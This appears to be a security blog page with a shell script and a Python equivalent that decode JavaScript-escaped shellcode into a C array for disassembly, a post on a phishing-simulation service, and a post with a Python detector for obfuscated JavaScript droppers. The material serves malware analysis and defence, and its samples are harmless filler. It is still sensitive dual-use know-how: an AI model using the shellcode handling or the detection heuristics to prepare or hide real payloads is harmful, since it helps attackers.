cat "$1" | perl -pe "s/\'\+\'//g" | perl -pe 's/\"\+\"//g' | perl -pe 's/\"//g' | perl -pe "s/\'//g" | perl /mnt/sda1/scripts/unescape.pl > /tmp/test5.bin

# hexdump prints 16-bit words in host byte order, so swap each pair back and emit
# one C string literal per word. -v stops hexdump collapsing repeated lines (a NOP
# sled would otherwise vanish into a single "*").
cat /tmp/test5.bin | hexdump -v | awk '{print $2 $3 $4 $5 $6 $7 $8 $9}' | perl -pe 's/(..)(..)/print("\"\\x".$2."\\x".$1."\"\n")/ge' | grep -P '^\"' > /tmp/test6.hex

# wrap the bytes in a C array plus an empty main; adjacent string literals concatenate
echo "unsigned char shellcode[]=" > /tmp/test7.c
cat /tmp/test6.hex >> /tmp/test7.c
echo ";" >> /tmp/test7.c
echo "int main(){}" >> /tmp/test7.c

gcc -c -o shellcode-compiled /tmp/test7.c
objdump -D shellcode-compiled > shellcode.disasm
rm -f /tmp/test5.bin /tmp/test6.hex /tmp/test7.c

# optional
less shellcode.disasm
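The preparation steps the script chains through perl, hexdump and awk, collected into one Python program as an added example (not the author's script and not the unescape.pl it calls). It strips the string concatenation, decodes %u (16-bit, low byte first), \x and %NN escapes straight to bytes, so the hexdump byte-swap step is not needed, and writes the same C wrapper for gcc -c and objdump -D. The sample input is constructed filler (NOPs, "AB" and an int3), not a captured payload.

```python
import re

# Constructed input in the form such scripts receive it: a JavaScript string built
# from concatenated pieces, mixing %u (16-bit, little-endian) and \x (byte) escapes.
# The bytes are filler (0x90 NOPs, "AB", 0xcc), not a real payload.
SAMPLE_INPUT = "'%u9090%u4241'+'\\x90\\xcc'"

ESCAPE = re.compile(
    r"[%\\]u([0-9a-fA-F]{4})"      # %uXXYY or \uXXYY: one 16-bit unit, low byte first
    r"|\\x([0-9a-fA-F]{2})"        # \xNN
    r"|%([0-9a-fA-F]{2})"          # %NN (URL encoding)
)


def clean_escaped(text):
    """Undo the string-building tricks the shell script strips: '+' and "+" between
    pieces, then the quotes themselves."""
    text = re.sub(r"'\s*\+\s*'", "", text)
    text = re.sub(r'"\s*\+\s*"', "", text)
    return text.replace('"', "").replace("'", "")


def unescape(text):
    """Turn escaped text into raw bytes. %uXXYY is a UTF-16LE code unit, so it
    becomes the two bytes YY XX; \\xNN and %NN become single bytes."""
    out = bytearray()
    for m in ESCAPE.finditer(text):
        unit, xx, pct = m.groups()
        if unit is not None:
            value = int(unit, 16)
            out += bytes([value & 0xFF, value >> 8])
        else:
            out.append(int(xx if xx is not None else pct, 16))
    return bytes(out)


def to_c_source(shellcode, name="shellcode", per_line=16):
    """Emit the wrapper the script builds: a byte array plus an empty main, ready for
    `gcc -c` and `objdump -D`. Nothing here executes the bytes."""
    lines = []
    for i in range(0, len(shellcode), per_line):
        chunk = shellcode[i:i + per_line]
        lines.append('    "' + "".join("\\x%02x" % b for b in chunk) + '"')
    body = "\n".join(lines) if lines else '    ""'
    return "unsigned char %s[] =\n%s;\nint main(void) { return 0; }\n" % (name, body)


def prepare(text):
    """Full pipeline: clean, unescape, wrap. Returns (raw bytes, C source)."""
    raw = unescape(clean_escaped(text))
    return raw, to_c_source(raw)


if __name__ == "__main__":
    raw, source = prepare(SAMPLE_INPUT)
    print(raw.hex())
    print(source)
```

Write the returned source to a file and continue with the script's `gcc -c` and `objdump -D` lines; the object file only carries the bytes as data, which is all the disassembly needs.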

Friday, February 29, 2008

Phish Me

Last night's NOVASec meeting was an interesting affair. After the presentation by Stratum Security, there was a lively discussion about targeted attacks and how unprepared many organizations are in facing this threat. Intrepidus Group founder Aaron Higbee introduced me to his phishme.com site. Looking over the service, it delivers an essential user training and social engineering testing function by allowing the penetration tester to develop custom targeted emails against a client. It tracks the deliveries, who opens the emails and who clicks the baited links inside, generating a graphical report for delivery to management. This is a great way to gauge the effectiveness of user awareness training programs and identify susceptible users that need retraining. Great product, Intrepidus!

Saturday, February 23, 2008

Idea for End-point Javascript Obfuscation Blocking

I was fortunate enough to attend a presentation by Daniel Peck, of CaffeineMonkey fame, on the characteristics of the JavaScript obfuscation attack. What struck me the most about the presentation were the graphs Mr. Peck included comparing the object characteristics of malicious scripts. While most scripts have a high number of interfacing calls (doc.write, writeln, print, alert, etc.) with rather short string content in their tags to direct the content loading, malicious scripts have relatively few interfacing objects with huge string objects (upwards of 80-90% of the script). Over the graphs of scanned sites he showed, it seems clear this is consistent across malicious vs. non-malicious sites. If this statistical analysis could be integrated into a plug-in, it would make for a rudimentary, yet effective barrier to obfuscated iframes and droppers. The plug-in would have to prevent script execution based on a user-defined ratio or percentage of calls to string content.

With a skeleton plug-in and the statistical analysis code in CaffeineMonkey open source, integration of the two should be possible.
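The ratio test described above, as an added example in Python (not CaffeineMonkey's code and not a plug-in). It measures what the graphs compared: the share of a script taken up by string literals, the longest single literal, and the number of interfacing calls, then flags a script when string content passes a user-set threshold and lives in at least one very long literal. Both samples are constructed; the "obfuscated" one is nothing but repeated filler escapes.

```python
import re

# One JavaScript string literal, single or double quoted, escapes allowed.
STRING_LITERAL = re.compile(r"'(?:\\.|[^'\\\n])*'|\"(?:\\.|[^\"\\\n])*\"")
# The "interfacing" calls the talk counted: output calls plus decode-and-run helpers.
INTERFACE_CALL = re.compile(
    r"\b(?:document\.write(?:ln)?|print|alert|eval|unescape)\s*\("
)

# Constructed samples, not captured scripts. The second is filler escapes only.
BENIGN_SAMPLE = """\
var box = document.getElementById('greeting');
var name = box.getAttribute('data-user');
document.write('<p class="hello">Welcome, ' + name + '</p>');
if (name === 'guest') { alert('Please sign in'); }
document.writeln('<hr>');
"""
OBFUSCATED_SAMPLE = 'var p = "' + "\\x41" * 200 + '";\n' + "document.write(unescape(p));\n"


def script_stats(script):
    """How much of the script is string content, how long its longest literal is,
    and how many interfacing calls it makes."""
    literal_lengths = [len(s) - 2 for s in STRING_LITERAL.findall(script)]   # minus the quotes
    return {
        "calls": len(INTERFACE_CALL.findall(script)),
        "string_share": sum(literal_lengths) / max(len(script), 1),
        "longest_literal": max(literal_lengths, default=0),
    }


def looks_obfuscated(script, max_string_share=0.8, min_literal=256):
    """Flag a script when string content dominates it (the 80-90% figure from the
    talk, adjustable by the user) and that content sits in at least one long literal,
    which is what an encoded iframe or dropper looks like before it is decoded."""
    s = script_stats(script)
    return s["string_share"] >= max_string_share and s["longest_literal"] >= min_literal


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("obfuscated", OBFUSCATED_SAMPLE)):
        print(label, script_stats(sample), looks_obfuscated(sample))
```

The two thresholds are the knobs a plug-in would expose; a site that legitimately embeds large JSON or template strings would need the literal-length floor raised rather than the share lowered.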